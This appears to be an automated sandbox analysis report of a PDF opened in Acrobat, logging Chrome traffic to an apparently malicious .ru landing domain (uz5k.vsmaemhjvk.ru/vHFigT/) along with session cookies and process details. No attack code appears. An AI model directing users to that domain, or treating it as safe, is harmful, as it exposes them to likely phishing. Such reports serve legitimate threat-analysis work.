                                                      2025-03-25 10:54:19 UTC487OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1
                                                      Host: www.google.com
                                                      Connection: keep-alive
                                                      X-Client-Data: CO6MywE=
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: empty
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-03-25 10:54:19 UTC1303INHTTP/1.1 200 OK
                                                      Date: Tue, 25 Mar 2025 10:54:19 GMT
                                                      Pragma: no-cache
                                                      Expires: -1
                                                      Cache-Control: no-cache, must-revalidate
                                                      Content-Type: text/javascript; charset=UTF-8
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-Uo-VjoeWXEhwGmUKRRCKXg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                      Accept-CH: Downlink
                                                      Accept-CH: RTT
                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                      Accept-CH: Sec-CH-UA-Platform
                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                      Accept-CH: Sec-CH-UA-Arch
                                                      Accept-CH: Sec-CH-UA-Model
                                                      Accept-CH: Sec-CH-UA-Bitness
                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                      Accept-CH: Sec-CH-UA-WoW64
                                                      Permissions-Policy: unload=()
                                                      Content-Disposition: attachment; filename="f.txt"
                                                      Server: gws
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Accept-Ranges: none
                                                      Vary: Accept-Encoding
                                                      Connection: close
                                                      Transfer-Encoding: chunked
                                                      2025-03-25 10:54:19 UTC1303INData Raw: 62 66 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 77 61 6c 74 20 64 69 73 6e 65 79 20 77 6f 72 6c 64 20 65 70 63 6f 74 20 66 69 72 65 22 2c 22 70 68 69 6c 61 64 65 6c 70 68 69 61 20 65 61 67 6c 65 73 22 2c 22 67 72 65 65 6e 20 63 61 72 64 20 68 6f 6c 64 65 72 20 69 63 65 20 64 65 74 65 6e 74 69 6f 6e 22 2c 22 6d 69 6e 65 63 72 61 66 74 20 75 70 64 61 74 65 73 20 67 68 61 73 74 22 2c 22 64 71 20 62 6c 69 7a 7a 61 72 64 73 20 38 35 20 63 65 6e 74 73 22 2c 22 61 74 6c 61 6e 74 61 20 67 6f 6c 66 20 63 6c 75 62 20 74 67 6c 22 2c 22 74 72 61 76 65 6c 20 77 61 72 6e 69 6e 67 73 20 61 6d 65 72 69 63 61 22 2c 22 75 6e 69 74 65 64 20 61 69 72 6c 69 6e 65 73 20 66 6c 69 67 68 74 20 70 61 73 73 70 6f 72 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22
                                                      Data Ascii: bf0)]}'["",["walt disney world epcot fire","philadelphia eagles","green card holder ice detention","minecraft updates ghast","dq blizzards 85 cents","atlanta golf club tgl","travel warnings america","united airlines flight passport"],["","","","","",""
                                                      2025-03-25 10:54:19 UTC1303INData Raw: 30 76 56 32 56 46 57 55 6c 46 64 33 4a 72 61 48 4d 7a 57 6c 5a 6d 4e 54 5a 47 4d 7a 52 51 4b 31 4d 34 55 6b 35 6a 4e 6b 6b 32 53 69 74 4f 61 46 6c 4c 4e 57 46 54 4e 32 39 47 56 48 42 59 53 6e 52 49 4d 6d 74 74 4e 58 63 31 64 6d 68 58 53 45 6c 55 63 45 68 71 57 47 56 4f 64 44 4d 77 4c 32 64 44 64 6e 59 72 55 6a 4a 61 4d 45 59 31 4d 6b 74 6c 61 46 4a 4d 62 79 39 57 52 47 4a 4a 64 54 49 7a 5a 32 70 57 57 6b 34 78 4f 56 59 76 55 45 34 76 65 56 4e 6a 56 47 52 70 51 6b 5a 44 4e 55 46 34 57 6c 5a 6e 53 55 77 7a 63 32 78 75 51 30 39 7a 4d 6b 6c 31 62 44 46 73 56 33 4e 59 63 46 56 6e 57 6b 4e 4b 56 6c 51 33 54 47 4a 53 52 57 6b 34 56 6d 5a 6c 65 47 52 4f 63 55 68 34 61 55 31 76 53 6b 56 78 52 32 70 42 4d 33 67 31 4e 79 74 54 4c 31 59 76 65 43 74 46 55 46 51 76 5a
                                                      Data Ascii: 0vV2VFWUlFd3JraHMzWlZmNTZGMzRQK1M4Uk5jNkk2SitOaFlLNWFTN29GVHBYSnRIMmttNXc1dmhXSElUcEhqWGVOdDMwL2dDdnYrUjJaMEY1MktlaFJMby9WRGJJdTIzZ2pWWk4xOVYvUE4veVNjVGRpQkZDNUF4WlZnSUwzc2xuQ09zMkl1bDFsV3NYcFVnWkNKVlQ3TGJSRWk4VmZleGROcUh4aU1vSkVxR2pBM3g1NytTL1YveCtFUFQvZ
                                                      2025-03-25 10:54:19 UTC457INData Raw: 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 22 32 31 38 30 36 39 32 36 33 39 35 33 37 34 31 31 38 34 36 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 2c 33 30 38 5d 2c 5b 33
                                                      Data Ascii: 003d","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggesteventid":"2180692639537411846","google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3
                                                      2025-03-25 10:54:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.649714151.101.194.1374431788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-03-25 10:54:20 UTC665OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                      Host: code.jquery.com
                                                      Connection: keep-alive
                                                      sec-ch-ua-platform: "Windows"
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                      sec-ch-ua-mobile: ?0
                                                      Accept: */*
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Sec-Fetch-Storage-Access: active
                                                      Referer: https://uz5k.vsmaemhjvk.ru/
                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-03-25 10:54:20 UTC564INHTTP/1.1 200 OK
                                                      Connection: close
                                                      Content-Length: 89501
                                                      Server: nginx
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                      ETag: "28feccc0-15d9d"
                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                      Access-Control-Allow-Origin: *
                                                      Cross-Origin-Resource-Policy: cross-origin
                                                      Accept-Ranges: bytes
                                                      Date: Tue, 25 Mar 2025 10:54:20 GMT
                                                      Via: 1.1 varnish
                                                      Age: 1569043
                                                      X-Served-By: cache-lga21965-LGA
                                                      X-Cache: HIT
                                                      X-Cache-Hits: 923
                                                      X-Timer: S1742900061.663101,VS0,VE0
                                                      Vary: Accept-Encoding
                                                      2025-03-25 10:54:20 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                      2025-03-25 10:54:20 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                      2025-03-25 10:54:20 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                      2025-03-25 10:54:20 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                      2025-03-25 10:54:20 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                      2025-03-25 10:54:20 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.649716104.21.48.14431788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-03-25 10:54:21 UTC1329OUTGET /favicon.ico HTTP/1.1
                                                      Host: uz5k.vsmaemhjvk.ru
                                                      Connection: keep-alive
                                                      sec-ch-ua-platform: "Windows"
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                      sec-ch-ua-mobile: ?0
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://uz5k.vsmaemhjvk.ru/vHFigT/
                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: XSRF-TOKEN=eyJpdiI6InI5VHgxa1VVVG00aVJPRXdVTk1LSnc9PSIsInZhbHVlIjoiS3g3V0hyMFBhRlVHVmV2MThlWHM0ZVhRK2Nway9JQ1kzN094RWU2TllQbTZCMEFyYlZFWUJPLzgyNDRaZEV4QURRUkNydDJIUHRDaUdWUnBlSmNzbSs5WEdBOUgyVEF2VjdGVlF3QXBqZmNoT0lWaVNHamd5YXVQKzJHMzVPRTkiLCJtYWMiOiJlZWRjMjMzZTMzNTMyYzUxMDI4MDc0ZTMwYjZjYjQ0NWQyNmI0MTQ3YmVhOTFiN2MzY2E4OWQ0OWE2OTU4OTg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InBVN0syMElCOGNwM055NjI5WTZJL3c9PSIsInZhbHVlIjoiSTEwSytnYmdBdnZ2ZTFVUEZicUUvc21FUnNad2ZkeGJZaFhVem5YZVN0Wm01cWlLckFZTWdzdFZxb1ZxNEpHY1hXM3JGbDRyZ05JT1VVQlZuUmJObTJFV1I0d0UwSk13Z05MYmR5U0psaWJ1aHJPc1JDeTFDdjcvNjNsUVpLU0YiLCJtYWMiOiJlNDVjODUyNjBkNzcyMzA0ZmFhNjM0NjNhNjhhMWUxYmMwM2VmMGQ4OWE0YjcwYWUwMTdkNmZmODMzOThkNzljIiwidGFnIjoiIn0%3D
                                                      2025-03-25 10:54:21 UTC1054INHTTP/1.1 404 Not Found
                                                      Date: Tue, 25 Mar 2025 10:54:21 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jJGU1M2lQdLPBLsmF3S9f5WaiYuhkTZcoDYAC5firLcfp%2FJW6VvEmvVmUsP7j4F7xeno8yvNku3SgddcT4bah1xsnNJu6jh7hOk1ISm6bmaIeaLaYMea%2BdtnbrlG"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Vary: Accept-Encoding
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=16420&min_rtt=16375&rtt_var=4634&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2235&delivery_rate=246465&cwnd=242&unsent_bytes=0&cid=a3bd80c0cebde74f&ts=215&x=0"
                                                      Cache-Control: max-age=14400
                                                      CF-Cache-Status: EXPIRED
                                                      Server: cloudflare
                                                      CF-RAY: 925ddea718bd432b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=99344&min_rtt=99271&rtt_var=21052&sent=6&recv=9&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1901&delivery_rate=37445&cwnd=233&unsent_bytes=0&cid=5a24554dda09c625&ts=503&x=0"
                                                      2025-03-25 10:54:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.64971835.190.80.14431788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-03-25 10:54:21 UTC533OUTOPTIONS /report/v4?s=jJGU1M2lQdLPBLsmF3S9f5WaiYuhkTZcoDYAC5firLcfp%2FJW6VvEmvVmUsP7j4F7xeno8yvNku3SgddcT4bah1xsnNJu6jh7hOk1ISm6bmaIeaLaYMea%2BdtnbrlG HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Origin: https://uz5k.vsmaemhjvk.ru
                                                      Access-Control-Request-Method: POST
                                                      Access-Control-Request-Headers: content-type
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-03-25 10:54:22 UTC336INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      access-control-max-age: 86400
                                                      access-control-allow-methods: POST, OPTIONS
                                                      access-control-allow-origin: *
                                                      access-control-allow-headers: content-type, content-length
                                                      date: Tue, 25 Mar 2025 10:54:21 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.64971935.190.80.14431788C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-03-25 10:54:22 UTC508OUTPOST /report/v4?s=jJGU1M2lQdLPBLsmF3S9f5WaiYuhkTZcoDYAC5firLcfp%2FJW6VvEmvVmUsP7j4F7xeno8yvNku3SgddcT4bah1xsnNJu6jh7hOk1ISm6bmaIeaLaYMea%2BdtnbrlG HTTP/1.1
                                                      Host: a.nel.cloudflare.com
                                                      Connection: keep-alive
                                                      Content-Length: 431
                                                      Content-Type: application/reports+json
                                                      Origin: https://uz5k.vsmaemhjvk.ru
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                      Accept-Encoding: gzip, deflate, br, zstd
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-03-25 10:54:22 UTC431OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 37 31 39 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 75 7a 35 6b 2e 76 73 6d 61 65 6d 68 6a 76 6b 2e 72 75 2f 76 48 46 69 67 54 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 34 38 2e 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22
                                                      Data Ascii: [{"age":0,"body":{"elapsed_time":719,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://uz5k.vsmaemhjvk.ru/vHFigT/","sampling_fraction":1.0,"server_ip":"104.21.48.1","status_code":404,"type":"http.error"},"type":"network-error"
                                                      2025-03-25 10:54:22 UTC214INHTTP/1.1 200 OK
                                                      Content-Length: 0
                                                      access-control-allow-origin: *
                                                      vary: Origin
                                                      date: Tue, 25 Mar 2025 10:54:22 GMT
                                                      Via: 1.1 google
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      • File
                                                      • Registry

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:06:53:43
                                                      Start date:25/03/2025
                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\PAD_[2025-03-24_120914].pdf"
                                                      Imagebase:0x7ff6e7a20000
                                                      File size:5'641'176 bytes
                                                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true
                                                      Show Windows behavior

                                                      File Activities

                                                      Show Windows behavior

                                                      Section Activities

                                                      Show Windows behavior

                                                      Registry Activities

                                                      Show Windows behavior

                                                      COM Activities

                                                      Show Windows behavior

                                                      Mutex Activities

                                                      Show Windows behavior

                                                      Process Activities

                                                      Show Windows behavior

                                                      Thread Activities

                                                      Show Windows behavior

                                                      Memory Activities

                                                      Show Windows behavior

                                                      System Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      Show Windows behavior

                                                      Windows UI Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                      General

                                                      Target ID:3
                                                      Start time:06:53:45
                                                      Start date:25/03/2025
                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                      Imagebase:0x7ff6adce0000
                                                      File size:3'581'912 bytes
                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true
                                                      Show Windows behavior

                                                      File Activities

                                                      Show Windows behavior

                                                      Section Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      Show Windows behavior

                                                      Mutex Activities

                                                      Show Windows behavior

                                                      Process Activities

                                                      Show Windows behavior

                                                      Thread Activities

                                                      Show Windows behavior

                                                      Memory Activities

                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
